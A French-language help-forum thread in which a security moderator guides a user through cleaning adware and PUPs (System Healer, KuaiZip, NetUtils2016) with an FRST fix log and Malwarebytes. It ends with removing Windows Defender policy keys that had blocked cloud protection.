HKLM\System\CurrentControlSet\Services\KuaiZipDrive => clé supprimé(es) avec succès
KuaiZipDrive => service supprimé(es) avec succès
NetUtils2016 => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\NetUtils2016 => clé supprimé(es) avec succès
NetUtils2016 => service supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\AVAST Software => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\{0B1CA18D-23AF-419A-A1FE-C97F67423924} => déplacé(es) avec succès
C:\Users\kiosk\.android => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\x7nC8N7ZuG => déplacé(es) avec succès
C:\Users\kiosk\AppData\Local\WikiThemes => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\KuaiZip_Update => déplacé(es) avec succès
C:\WINDOWS\web.bat => déplacé(es) avec succès
C:\WINDOWS\unins000.exe => déplacé(es) avec succès
C:\WINDOWS\Tasks\System HealerPeriod.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\System HealerStartUp.job => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{ACD09D8F-4F5F-4D64-9EC8-A342DD77BC2D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACD09D8F-4F5F-4D64-9EC8-A342DD77BC2D} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\System HealerStartUp => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerStartUp => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B5E9E935-152D-4400-B7FC-3D3715F432F8} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B5E9E935-152D-4400-B7FC-3D3715F432F8} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\SystemHealer Monitor => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemHealer Monitor => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D70E8630-7364-451B-9B14-9A5FE016220B} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D70E8630-7364-451B-9B14-9A5FE016220B} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\KuaiZip_Update => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KuaiZip_Update => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8F9877D7-881A-45E6-A697-FEF0F665317B} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8F9877D7-881A-45E6-A697-FEF0F665317B} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{0B1CA18D-23AF-419A-A1FE-C97F67423924} => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0B1CA18D-23AF-419A-A1FE-C97F67423924} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{90868FA7-427E-4C4B-92C0-9FDBB9FD4EEC} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{90868FA7-427E-4C4B-92C0-9FDBB9FD4EEC} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Drejach => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Drejach => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{77B7F960-D20D-43C5-A66E-715057D1CB28} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{77B7F960-D20D-43C5-A66E-715057D1CB28} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3638343833393932362d5b4a4a416c34232a2a6c555a => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_UpdateTask_Time_3638343833393932362d5b4a4a416c34232a2a6c555a => clé supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\8ZZKLXNLI5 => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\8ZZKLXNLI5 => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\CDC8HW0BPU => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\CDC8HW0BPU => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\5M02VND77I => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\5M02VND77I => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\T1DMZZS8E8 => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\T1DMZZS8E8 => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\ZQCMZOXKW7 => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\ZQCMZOXKW7 => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\PH6PVRD7QQ => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\PH6PVRD7QQ => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\RHVW6AMN83 => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\RHVW6AMN83 => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\IW4RJL4VX2 => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\IW4RJL4VX2 => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\6UHQUALR39 => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\6UHQUALR39 => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\TXMK444M0A => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\TXMK444M0A => valeur non trouvé(e).
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\TJTGEQXYH0 => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\TJTGEQXYH0 => valeur non trouvé(e).
C:\WINDOWS\system32\Drivers\KuaiZipDrive.sys => déplacé(es) avec succès
C:\WINDOWS\unins000.dat => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3638343833393932362d5b4a4a416c34232a2a6c555a" => non trouvé(e).
C:\Users\kiosk\AppData\Roaming\Softlink => déplacé(es) avec succès
C:\ProgramData\SearchModule => déplacé(es) avec succès
C:\WINDOWS\window.bat => déplacé(es) avec succès
C:\Program Files\Common Files\Noobzo => déplacé(es) avec succès
C:\WINDOWS\system32\NetUtils2016.dll => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\gplyra => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\NetUtils2016.sys => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\NetUtils2016.exe => déplacé(es) avec succès
C:\ProgramData\smp2.exe => déplacé(es) avec succès
C:\WINDOWS\rsrcs.dll => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\SMW_P => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\sstmp => déplacé(es) avec succès
C:\WINDOWS\system32\sstmp => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\alFSVWJB => déplacé(es) avec succès
C:\Users\kiosk\AppData\Local\AppTrailers => déplacé(es) avec succès
"C:\WINDOWS\Tasks\System HealerStartUp.job" => non trouvé(e).
C:\WINDOWS\System32\Tasks\System HealerPeriod => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\System HealerStartUp" => non trouvé(e).
C:\WINDOWS\SysWOW64\findit.xml => déplacé(es) avec succès
C:\ProgramData\Hotfreshs => déplacé(es) avec succès
C:\ProgramData\Logic Handler => déplacé(es) avec succès
"C:\WINDOWS\Tasks\System HealerPeriod.job" => non trouvé(e).
C:\Users\kiosk\AppData\Roaming\agent.dat => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\Singlematstrong.tst => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\noah.dat => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\Config.xml => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\Main.dat => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\md.xml => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\System Healer Task => déplacé(es) avec succès
C:\ProgramData\1e0400bd-3dd5-1 => déplacé(es) avec succès
C:\ProgramData\1e0400bd-1935-0 => déplacé(es) avec succès
C:\ProgramData\NetworkPacketManitor => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\System Healer => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\SystemHealer Run Delay => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\SystemHealer Monitor" => non trouvé(e).
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\InstallationConfiguration.xml => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\Installer.dat => déplacé(es) avec succès
C:\Users\kiosk\AppData\Local\Javoenthusery => déplacé(es) avec succès
C:\WINDOWS\system32\SSL => déplacé(es) avec succès
C:\Users\kiosk\AppData\Roaming\Reogtion => déplacé(es) avec succès
C:\Users\kiosk\AppData\Local\Kiqupy => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Plcult Helper => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\Drejach" => non trouvé(e).
C:\Users\kiosk\2277a_Utu.epub => déplacé(es) avec succès
C:\Users\kiosk\8134f_Dossier64.epub => déplacé(es) avec succès
C:\Users\kiosk\Desktop\epub drm => déplacé(es) avec succès
C:\Users\kiosk\ce45f_Dlivrance.epub => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\{C853C886-D06C-4AA1-B042-D222E9EF4AAA} => déplacé(es) avec succès
Impossible de déplacer "C:\Windows\System32\Drivers\etc\hosts" => Planifié pour déplacement au redémarrage.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2295277969-3987285774-247871138-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 833928 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 25541898 B
Java, Flash, Steam htmlcache => 3102 B
Windows/system/drivers => -99923 B
Edge => 215578873 B
Chrome => 23097581 B
Firefox => 366643722 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 119787 B
NetworkService => 18946882 B
kiosk => 69348766 B
Administrator => 33541439 B

RecycleBin => 486691899 B
EmptyTemp: => 1.2 GB données temporaires supprimées.

================================

Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 20-02-2017 10:45:55)

C:\Windows\System32\Drivers\etc\hosts => a été déplacé(e) avec succès
Impossible de restaurer Hosts.

Fin de Fixlog 10:45:55

Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110
Pour ton problème d'activation de Windows Defender, regarde là : https://www.malekal.com/impossible-dactiver-windows-defender/


~~

puis :

MalwareBytes ( durée : environ 40min de scan ):
==================================================
Télécharge et installe MBAM. La version gratuite permet de nettoyer ( décoche bien la proposition d'essai de la version Premium à la fin de l'installation ) :

Mettre MBAM à jour puis lancer un examen.
A la fin du scan, clique sur "Supprimer Sélection" en bas à gauche.
Redémarrer l'ordinateur si nécessaire puis relancer Malwarebytes.

Vas chercher le rapport dans l'onglet "Historique".
A gauche "Journal d'analyse", double-clique sur l'examen dans la liste. Puis en bas "Copier dans le presse papier", va sur http://pjjoint.malekal.com/, clique droit "Coller" pour coller le contenu du rapport du scan. Clique sur "Envoyer". Dans un nouveau message ici en réponse, donne le lien pjjoint afin de pouvoir consulter le rapport.


Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Bonjour,
Après avoir exécuté toutes les instructions de votre dernier message, voici le compte-rendu de MBAM:
https://pjjoint.malekal.com/files.php?id=20170221_h9w9e11w8h11

Cependant, le libellé "certains paramètres sont gérés par votre entreprise" apparait toujours lorsque je souhaite activer Windows Defender et désinstaller Kaspersky dont je profite d'une version d'essai qui prendra bientôt fin.
Que faire ???
ET toujours merci pour votre aide précieuse.
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
>
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020

Bonjour,
Par sécurité je viens de relancer la procédure. Windows defender peut-être activé mais le libellé "certains paramètres sont gérés par votre entreprise" apparait toujours.
D'autre part je ne peux pas activer la protection dans le cloud.
Cordialement
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110 >
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Même après le copier/coller dans l'invite de commandes ?

Tu peux l'ouvrir Windows Defender et faire des scans ou même pas ?
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
>
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020

Oui je peux l'ouvrir et je viens de lancer un scan complet.
Mais tant que ce libellé apparit, je ne suis pas sure de la protection de mon PC.
Et pourquoi je ne peux pas activer la protection dans le cloud?
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110 >
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Refais un scan FRST pour voir
donne les rapports via pjjoint.
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
>
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020

Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110
Peux-tu fournir une capture d'écran du message "certains paramètres sont gérés par votre entreprise", sur la protection Cloud et autres.
J'aimerai bien l'avoir.

As-tu cette clé ?
Touche Windows + R
tape regedit et OK.
Déroule :
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

Si tu as DisableRealtimeMonitoring
Supprime la.

Vérifie aussi :
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

Veuillez appuyer sur une touche pour continuer la désinfection...
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Voici la capture de l'écran par pjjoint:
https://pjjoint.malekal.com/files.php?id=20170222_c12l13t5z15r10

En ce qui concerne le registre (par ordre alphabétique) :
- il n'y a pas HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection ,

mais HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ PolicyManager avec pour valeur REG-SZ valeur non définie

et HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet avec pour valeurs REG-SZ valeur non définie
et REG-DWORD 0x00000000(0) et REG-DWORD 0x00000002(2)

Il n'y a pas HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection , seulement HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\SystemCertificate
et HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion,
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\DataCollection et
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer

Encore merci
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
>
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020

J'ai tout vérifié, même windows defender offline, tout semble ok sauf la protection dans le cloud ainsi que l'envoi automatique d'un échantillon que je ne peux pas activer.

Et toujours un grand merci ....
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110 >
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Regarde là : https://www.malekal.com/recherche-dans-la-base-de-registre-de-windows/

Utilise Regscanner, fais une recherche sur le mot policies
Tu peux filtrer sur la date, faudrait je pense mettre au 1er Janvier 2017, ça doit être récent ces problèmes.

Enregistre tout le contenu.
envoie sur http://pjjoint.malekal.com
Donne le lien ici pour voir.
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
>
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020

Bonsoir,
Voila l'extraction du registre:
https://pjjoint.malekal.com/files.php?id=20170223_h7p14e5j6d9
Il y a 145 éléments.
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018
>
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

En fait, j'ai commencé à avoir des problèmes le 18 février.
J'ai refait une extraction à partir de cette date , il y a 114 éléments.
Si cela t'intéresse, je peux te renvoyer cette extraction sous un format que tu dois me préciser car le format text ne semble pas très pratique
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110 >
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Regarde déjà ma réponse ci-dessous.
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110
Ces clés là sont à 0.
Clé du Registre : HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
Nom : DisableAntiSpyware
Type : REG_DWORD
Données : 0x00000000 (0)

Clé du Registre : HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
Nom : SpyNetReporting
Type : REG_DWORD
Données : 0x00000000 (0)


Par contre ça à 2.. Peut-être la source de ton "certains paramètres sont gérés par votre entreprise"

Clé du Registre : HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
Nom : SubmitSamplesConsent
Type : REG_DWORD
Données : 0x00000002 (2)

Supprime toutes ces clés dans HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
SubmitSamplesConsent
SpyNetReporting
DisableAntiSpyware


Le dossier Spynet, tu peux même le virer je pense.

Redémarre l'ordinateur ensuite.
Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

Bravo !!!!!
j'ai supprimé HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
SubmitSamplesConsent
SpyNetReporting
DisableAntiSpyware
et ...plus de libellé, la protection dans le cloud et l'envoi automatique d'un échantillon sont activés.
Un très très grand MERCI
Messages postés
180060
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 septembre 2020
22 110
Super :)

Bonne soirée :)


Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

Messages postés
17
Date d'inscription
dimanche 19 février 2017
Statut
Membre
Dernière intervention
7 février 2018

OK!
Bonne soirée aussi!!